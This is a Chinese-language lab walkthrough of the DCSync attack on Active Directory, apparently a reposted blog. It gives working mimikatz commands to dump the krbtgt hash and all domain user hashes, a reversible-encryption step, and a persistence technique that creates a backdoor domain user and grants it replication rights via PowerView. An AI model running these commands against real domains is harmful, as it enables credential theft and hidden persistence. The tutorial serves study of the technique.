域凭证获取——DCSync

news2024/11/16 6:13:39

文章目录

  • 一、DCSync简介
  • 二、利用DCSync获取域内用户哈希
  • 三、DCSync可逆加密利用(没搞定)
  • 四、域外利用DCSync获取域用户哈希(待完成)
  • 五、利用ACL滥用进行DCSync持久化

在这里插入图片描述
攻击机kali IP:192.168.111.0
跳板机win7 IP:192.168.111.128,192.168.52.143
靶机win server 2008 IP:192.168.52.138

一、DCSync简介

在一个大型网络中往往存在多台域控制器(DC),每台DC都需要保持最新的凭证,而保持最新凭证的方法就是在各个域控制器之间进行数据共享,共享用户凭证、安全描述符等域内变更信息。于是微软推出了目录复制服务,这个服务让域控制器可以在其他域控制器进行任何修改时进行更新。例如,DC1新增了一个名为test的域用户,那么DC2就可以通过该服务的自身同步功能同时更新test用户。

DCSync就是伪装域控制器并使用DSGetNCChanges函数来请求其他域控制器获取域内的用户凭证。DCSync攻击已经被集成到mimikatz中,在使用DCSync时mimikatz会自动模拟域控制器,并要求其他域控制器使用Microsoft目录复制服务远程协议(MS-DRSR)来获取域内用户凭证,它可以通过这些手段要求其他域控制器将NTDS.DIT信息同步给自身模拟的域控制器。特别注意:对于这些操作,无需在域控制器上执行任何一条命令

二、利用DCSync获取域内用户哈希

执行DCSync攻击的域用户必须具有复制目录更改所有项权限(Replicating Directory Changes All)和复制目录更改权限(Replicating Directory Changes),而在域内默认拥有有两种权限的用户如下:

  • 域控制器本地管理员组
  • 域管理员组
  • 企业管理员组
  • 域控制器计算机账户

1、这里win 7作为域内主机,同时使用域内成员god\test登录win 7;该域成员并非域管理员,但在域内拥有“复制目录更改”和“复制目录更改所有项”权限。

在AD管理中心点击域的属性
在这里插入图片描述
先添加当前域成员,在授权相应的权限。
在这里插入图片描述

2、利用该用户执行mimikatz的DCSync功能以获取指定域成员哈希。这里尝试获取krbtgt用户的凭证,该用户是获取黄金票据是的重要用户。命令如下:

# 获取域内krbtgt用户的哈希
mimikatz.exe "lsadump::dcsync /domain:god.org /user:krbtgt" exit

在这里插入图片描述

3、获取域内所有用户的哈希

# 获取域内所有用户的哈希
mimikatz.exe "lsadump::dcsync /domain:god.org /all /csv" exit

在这里插入图片描述

三、DCSync可逆加密利用(没搞定)

当用户账号设置ReverseiblePasswordEncryption(可逆加密)属性后,攻击者可以直接获取该用户的明文密码。前提是该域用户在设置可逆加密属性后修改过密码

# 为test域用户设置可逆加密属性
Set-ADUser test -AllowReversiblePasswordEncryption $true

老是报错
在这里插入图片描述

设置该属性后,使用mimikatz获取该域用户的明文密码。

lsadump::dcsync /domain:god.org /user:test

四、域外利用DCSync获取域用户哈希(待完成)

待完成。

五、利用ACL滥用进行DCSync持久化

如果想进行DCSync攻击,所用的账号需要有DS-Replication-Get-ChangesDS-Replication-Get-Changes-All这两个权限。DCSync攻击可用于持久化工作中

下面的实验是在域控win server 2008上完成,假设已经拿到域管的账号密码。下一步进行权限维持。
1、执行下面的命令新建一个域用户,并赋予“复制目录更改”和“复制目录更改所有项”两个权限。

# 域内新建用户
# net user <username> <password> /add /domain
net user hacker admin123. /add /domain

# 域内删除用户
# net user <username> /del /domain
net user hacker /del /domain

在这里插入图片描述

import-module .\Powerview.ps1 # 导入Powerview.ps1
Add-DomainObjectAcl -TargetIdentity "DC=god,DC=org" -PrincipalIdentity hacker -Rights DCSync -Verbose
# DC=god,DC=org:代表god.org,即域名
# -PrincipalIdentity:指定所需添加到域的用户名
# -Rights:指定需要获取的权限
# -Verbose:显示详细运行信息

在这里插入图片描述
在这里插入图片描述
2、使用god\hacker登录域内机器,并进行DCSync攻击。

mimikatz.exe "lsadump::dcsync /domain:god.org /all /csv" exit

在这里插入图片描述

3、如果想要查询域内哪些用户拥有“复制目录更改”和“复制目录更改所有项”两个权限。使用如下命令(下图实在域控上执行的,管理员打开powershell):

# 获取拥有“复制目录更改”和“复制目录更改所有项”两个权限的用户
import-module .\Powerview.ps1 # 导入Powerview.ps1
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.ObjectAceType -match "DS-Replication-Get-Changes"} # 需要域管账号

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1984182.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

nodeJS的一点个人总结

nodejs 并不是JavaScript应用&#xff0c;也不是编程语言&#xff0c;因为编程语言使用的JavaScript,Nodejs是 JavaScript的运行时。这个**“运行时”**概念很重要&#xff0c;理解了这个&#xff0c;就理解了nodeJS。 • Node.js并不是JavaScript应用&#xff1a;这里的"…

应对AI辅助编程工具的崛起:程序员的变革之道

目录 前言1. AI工具如何改变日常编码实践1.1 自动补全和代码生成1.2 提高工作效率 2. AI工具带来的潜在风险2.1 编程基本功弱化2.2 创新能力下降2.3 数据隐私与安全 3. 在AI时代的核心竞争力3.1 复杂系统设计能力3.2 跨学科知识整合能力3.3 与AI协作的能力 4. 如何培养核心能力…

鲜花销售小程序的设计

管理员账户功能包括&#xff1a;系统首页&#xff0c;个人中心&#xff0c;用户管理&#xff0c;商家管理&#xff0c;鲜花信息管理&#xff0c;鲜花分类管理&#xff0c;管理员管理&#xff0c;系统管理 微信端账号功能包括&#xff1a;系统首页&#xff0c;购物车&#xff0…

数据结构 - 并查集路径压缩

&#x1f49d;&#x1f49d;&#x1f49d;首先&#xff0c;欢迎各位来到我的博客&#xff0c;很高兴能够在这里和您见面&#xff01;希望您在这里不仅可以有所收获&#xff0c;同时也能感受到一份轻松欢乐的氛围&#xff0c;祝你生活愉快&#xff01; 文章目录 引言一、并查集…

第37届百花奖采用8K技术直播颁奖典礼

8月2日至4日&#xff0c;由中国文学艺术界联合会、中国电影家协会、中共四川省委宣传部、成都市人民政府共同主办第37届大众电影百花奖在成都隆重举行。作为“中国电影三大奖”之一&#xff0c;百花奖汇聚国内优秀的电影作品与电影人&#xff0c;向全球展示中国电影产业技术蓬勃…

渗透小游戏,各个关卡的渗透实例---步骤简单(含代码)

文章目录 Less-1Less-2Less-5updatexml报错注入&#xff1a; Less-6Less-7Less-8Less-9Less-11Less-13Less-15 Less-1 首先&#xff0c;可以看见该界面&#xff0c;该关卡主要是SQL注入&#xff0c;由于对用户的输入没有做过滤&#xff0c;使查询语句进入到了数据库中&#xff…

苹果照片删除了如何恢复回来?大家都会用的4个方法

随着我们频繁地使用手机拍照&#xff0c;意外删除照片的情况也屡见不鲜。好在&#xff0c;苹果手机提供了一系列实用的功能和工具&#xff0c;可以最大程度上帮助我们解决苹果照片删除了如何恢复回来的问题。接下来&#xff0c;就让我们一起了解一下这4个好用的技巧吧。 方法一…

JavaEE 第5节 死锁产生的原因

目录 一、死锁场景 场景1&#xff1a;1个线程1个锁 场景2&#xff1a;2个线程2个锁 场景3&#xff1a;N个线程M个锁 二、出现死锁的四个必要条件 1&#xff09;锁的互斥性&#xff08;Mutual Exclusion&#xff09; 2&#xff09;锁的不可抢占性&#xff08;Non-preempt…

容器跨主机通信:Flannel网络实现机制分析

Docker与Kubernetes系列 容器跨主机通信&#xff1a;Flannel网络实现机制分析 - 文章信息 - Author: 李俊才 (jcLee95) Visit me at CSDN: https://jclee95.blog.csdn.netMy WebSite&#xff1a;http://thispage.tech/Email: 291148484163.com. Shenzhen ChinaAddress of thi…

NLP——文本预处理

本文思维导图 文本预处理及其作用 文本语料在输送给模型前一般需要一系列的预处理工作, 才能符合模型输入的要求, 如: 将文本转化成模型需要的张量, 规范张量的尺寸等, 而且科学的文本预处理环节还将有效指导模型超参数的选择, 提升模型的评估指标. 一、文本处理的基本方法 1…

职业院校工业互联网平台应用实训室解决方案

摘要&#xff1a;随着“中国制造2025”战略的深入实施&#xff0c;工业互联网作为新一代信息技术与制造业深度融合的关键支撑&#xff0c;对我国产业升级和经济转型具有重要意义。为培养适应未来工业发展需求的技术技能人才&#xff0c;职业院校需要建立工业互联网平台应用实训…

Python爬虫新手指南及简单实战

网络爬虫是自动化获取网络信息的高效工具&#xff0c;Python因其强大的库支持和简洁的语法成为编写网络爬虫的首选语言。本教程将通过一个具体的案例&#xff08;基于Microsoft Edge浏览器的简单爬取&#xff09;&#xff0c;指导你使用Python实现一个完整的网络爬虫&#xff0…

群晖出现grub-editenv:error:environment block too small

起因&#xff1a; 想修改一下东西&#xff0c;结果找到配置修改后出现grub2-editenv: error: environment block too small. ,然后就不能启动了 原因是&#xff1a; 修改的部分导致启动环境检测到内存分配的较小 解决 1.切换管理用户 sudo -i 2.找文件并备份 find / -name gru…

基于C#调用文心一言大模型制作桌面软件(可改装接口)

目录 开发前的准备账号注册应用创建应用接入 开始开发创建项目设计界面使用 AK&#xff0c;SK 生成鉴权签名窗体代码 百度智能云千帆大模型平台什么是百度智能云千帆大模型平台模型更新记录 开发前的准备 账号注册 访问百度智能云平台&#xff0c;通过百度账号登录或手机号验证…

边缘计算在智能交通系统中的应用探究

随着社会的进步和科技的不断发展&#xff0c;智能交通系统正逐渐成为现代城市交通管理的重要组成部分。边缘计算作为一种新兴的计算模式&#xff0c;被广泛应用于智能交通系统中&#xff0c;为其带来了巨大的变革和改进。本文将从边缘计算的原理、优势以及在智能交通系统中的应…

61监听器

监听器 概念 监听器用于监听web应用中某些对象信息的创建、销毁、增加&#xff0c;修改&#xff0c;删除等动作的 发生&#xff0c;然后作出相应的响应处理。当范围对象的状态发生变化的时候&#xff0c;服务器自动调用 监听器对象中的方法。 常用于统计在线人数和在线用户&am…

Hbase 综合实验

1、设计表保存通话记录信息&#xff0c;实现相关查询功能 创建ua50tel表&#xff0c;并插入数据&#xff08;实训报告中‘&#xff1a;’存在于表中但会识别为语法所以在此不使用&#xff09; 依次重复上面的过程按实际输入&#xff0c;并查看表的内容 查询某人当月通话记录 …

内网电脑如何通过外网IP访问内网的服务器

内网的电脑&#xff0c;如何使用公网IP访问内网的服务器&#xff1f;写下这个标题&#xff0c;连我自己都学得拗口&#xff0c;可是又想不到更合适的标题。 正常来说&#xff0c;内网的电脑访问内网的服务器&#xff0c;当然是使用服务器的内网IP地址和端口&#xff0c;比如说&…

建立的Qsys系统变成Symbol Files

1.Platform Designer下&#xff0c;点击Generate 2.

C++数组全面讲解

文章目录 数组介绍数组的特点数组的优缺点数组和其他数据结构的比较 静态数组与动态数组的详细讲解一、静态数组1. 一维数组声明与初始化注意事项特点 2. 二维数组声明与初始化注意事项特点 3. 三维数组声明与初始化注意事项特点 二、动态数组1. 一维数组声明与初始化注意事项特…